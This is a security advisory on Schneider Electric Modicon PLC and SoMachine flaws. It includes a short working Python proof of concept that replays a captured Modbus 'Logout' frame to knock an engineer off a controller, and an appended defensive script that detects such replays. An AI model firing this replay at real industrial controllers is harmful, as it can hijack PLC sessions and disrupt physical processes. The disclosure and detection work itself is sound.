Trustwave SpiderLabs Security Advisory TWSL2020-001:
Multiple Vulnerabilities in Schneider Electric Products

Published: 05/07/20
Version: 1.0

Vendor: Schneider Electric (https://www.se.com/)

Finding 1: Authentication Bypass by Capture-replay
***************
Credit: Seok Min Lim of Trustwave
Product: Modicon M221
Version affected: All
CVE: CVE-2017-6034
CWE: 294

In SoMachine Basic v1.6 Build 62620, there is a man-in-the-middle vulnerability in which unauthorized users are able to replay packets and terminate an authorized user's connection to the PLC. If an attacker exploits this vulnerability, the user is logged off the PLC, allowing the attacker to communicate with the PLC and perform further administrative actions. Please note that this attack requires the attacker to spoof the IP address of the host on which SoMachine is logged in to the PLC.

Please note that this vulnerability was originally discovered by Eran Goldstein (CRITIFENCE) and Benjamin Green (Lancaster University). This vulnerability description and mitigation were updated following additional research. Previously it was stated that these conditions occurred because the PLC did not check the authenticity of the packets. However, it was discovered that the target PLC still accepts any request from a third party even while a valid session is held by another client. This reflects a lack of authorization.

As a proof of concept, the following Python script replays the "Logout" packet twice to the PLC.
# Run using Python 3
import socket
import sys

# Captured "Logout" request as a hex string: a Modbus/TCP frame (MBAP header
# followed by function code 0x5a and two payload bytes)
payload = "00d600000004015a9c11"
ipAddress = "172.16.0.4"   # target PLC
port = 502                 # Modbus/TCP

serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect_ex() returns an errno instead of raising; stop if the connect failed
err = serversocket.connect_ex((ipAddress, port))
if err != 0:
    print("Connection failed, errno", err)
    sys.exit(1)

# Replay the captured frame twice
serversocket.send(bytes.fromhex(payload))
serversocket.send(bytes.fromhex(payload))
print("Payload Sent!")
serversocket.close()

Finding 2: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
***************
Credit: Seok Min Lim and Johnny Pan of Trustwave
Products: SoMachine Basic, EcoStruxure Machine Expert, Modicon M100 Logic Controller, Modicon M200 Logic Controller, Modicon M221 Logic Controller
Version affected: All versions
CVE: CVE-2020-7489
CWE: 74

There is a vulnerability that attackers can use to substitute a modified DLL, allowing malicious code to be transferred to the controller. The attacker is then able to change the behaviour of the software's functions. One such scenario is changing the "Start" command to "Stop", preventing the OT engineer from starting the controller from the software.

Remediation Steps:
Upgrade the affected software/firmware to the latest version.

Revision History:
04/17/2019 - Vulnerabilities disclosed to vendor
08/13/2019 - Existing CVE expanded to include mitigations for first issue
02/20/2020 - PoC provided for replication of second issue
04/14/2020 - Patch released by vendor
05/07/2020 - Advisory published

References
1. https://www.se.com/ww/en/download/document/SEVD-2017-065-01/
2. https://www.se.com/ww/en/download/document/SEVD-2020-105-01/
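Detection logic for the replay described in Finding 1 above, added here as an example; it is not part of the Trustwave advisory and is neither Trustwave's nor Schneider's code. It assumes the standard Modbus/TCP MBAP header layout (transaction id, protocol id, length, unit id, then the function code), treats function code 0x5a as the Schneider engineering (UMAS) function code, and uses a constructed allowlist of engineering workstations and constructed sample frames, one of which reuses the frame bytes from the PoC. Because the advisory notes that the attacker spoofs the engineering workstation's IP address, the replay check keys on frame content rather than on the source address: a legitimate client increments the transaction id, so a byte-identical frame arriving again within a short window is suspicious regardless of who appears to have sent it.

```python
"""Flag replayed or out-of-place Modbus/TCP frames carrying function code 0x5a.

Added example (not from the advisory). Sample traffic below is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
import struct

UMAS_FUNCTION_CODE = 0x5A            # Schneider engineering protocol over Modbus/TCP
ENGINEERING_HOSTS = {"172.16.0.10"}  # assumed allowlist of SoMachine workstations
REPLAY_WINDOW_S = 5.0                # identical frame seen again within this window


@dataclass(frozen=True)
class Mbap:
    transaction_id: int
    protocol_id: int
    length: int
    unit_id: int
    function_code: int
    payload: bytes


def parse_frame(raw: bytes) -> Mbap:
    """Parse the 7-byte MBAP header plus function code; raise on malformed input."""
    if len(raw) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, uid, fc = struct.unpack("!HHHBB", raw[:8])
    if pid != 0:
        raise ValueError(f"protocol id {pid} is not Modbus")
    # The length field counts unit id + function code + payload.
    if length != len(raw) - 6:
        raise ValueError(f"length field {length} does not match frame size {len(raw) - 6}")
    return Mbap(tid, pid, length, uid, fc, raw[8:])


def detect(events):
    """events: iterable of (timestamp_seconds, src_ip, frame_bytes).

    Returns a list of (timestamp, src_ip, reason) alerts, in event order.
    """
    alerts = []
    seen = defaultdict(list)  # frame bytes -> recent timestamps (source ignored: IPs can be spoofed)
    for ts, src, raw in events:
        try:
            frame = parse_frame(raw)
        except ValueError as exc:
            alerts.append((ts, src, f"malformed frame: {exc}"))
            continue
        if frame.function_code != UMAS_FUNCTION_CODE:
            continue  # ordinary Modbus traffic is out of scope here
        if src not in ENGINEERING_HOSTS:
            alerts.append((ts, src, "UMAS frame from host outside engineering allowlist"))
        recent = [t for t in seen[raw] if ts - t <= REPLAY_WINDOW_S]
        if recent:
            alerts.append((ts, src, "identical UMAS frame repeated within replay window"))
        recent.append(ts)
        seen[raw] = recent
    return alerts


# Constructed sample traffic (timestamp, source, frame). Frame B reuses the PoC bytes.
FRAME_A = bytes.fromhex("00d500000004015a9c01")
FRAME_B = bytes.fromhex("00d600000004015a9c11")
SAMPLE_EVENTS = [
    (100.0, "172.16.0.10", FRAME_A),                                  # workstation, fresh transaction id
    (100.5, "172.16.0.10", FRAME_B),                                  # workstation, next transaction id
    (101.0, "172.16.0.10", FRAME_B),                                  # same bytes again: spoofed source
    (101.2, "172.16.0.99", FRAME_B),                                  # same bytes from an unknown host
    (102.0, "172.16.0.20", bytes.fromhex("0001000000060103000a0001")),  # plain Modbus read, FC 3
    (103.0, "172.16.0.20", bytes.fromhex("0001000000")),              # truncated frame
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for ts, src, reason in run_sample():
        print(f"{ts:7.1f} {src:<13} {reason}")
```

Running the module prints four alerts: one replay from the (spoofed) workstation address, an allowlist hit plus a replay from the unknown host, and one malformed frame. The allowlist check alone would have missed the third event, which is the case the advisory describes.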
About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.